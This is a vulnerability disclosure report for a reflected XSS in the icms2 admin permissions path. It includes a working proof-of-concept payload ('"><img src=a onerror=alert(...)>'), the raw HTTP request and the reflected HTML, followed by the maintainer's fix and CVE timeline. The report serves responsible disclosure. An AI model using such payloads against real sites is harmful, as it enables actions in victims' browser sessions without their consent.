Reflected XSS in URL path of '/admin/controllers/edit/activity/perms/' in instantsoft/icms2


Reported on

Aug 4th 2023


/admin/controllers/edit/activity/perms/ takes input from the URL directly without sufficient sanitization leading to a Reflected XSS.

A valid admin session is required, without it, the user will be brought to the login page instead of the affected page.

Proof of Concept

  1. Login as an administrator
  2. Visit the following URL to trigger JavaScript code: http://icms.local/admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E


"><img src=a onerror=alert(location.origin)>


GET /admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1
Host: icms.local

The inserted input would then be reflected on the page like this:

<form action="/admin/controllers/edit/activity/perms_save/"><img src=a onerror=alert(location.origin)>" method="post">

Remedial Action

It is recommended to sanitize the input before it is reflected on the affected page.


An attacker could perform unauthorized actions in the context of the victim's browser.

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 2 months ago
We have contacted a member of the instantsoft/icms2 team and are waiting to hear back 2 months ago
instantsoft/icms2 maintainer
2 months ago



instantsoft/icms2 maintainer validated this vulnerability 2 months ago
legpains has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
instantsoft/icms2 maintainer marked this as fixed in 2.16.1-git with commit 1dbc3e 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
instantsoft/icms2 maintainer published this vulnerability 2 months ago
instantsoft/icms2 maintainer gave praise 2 months ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation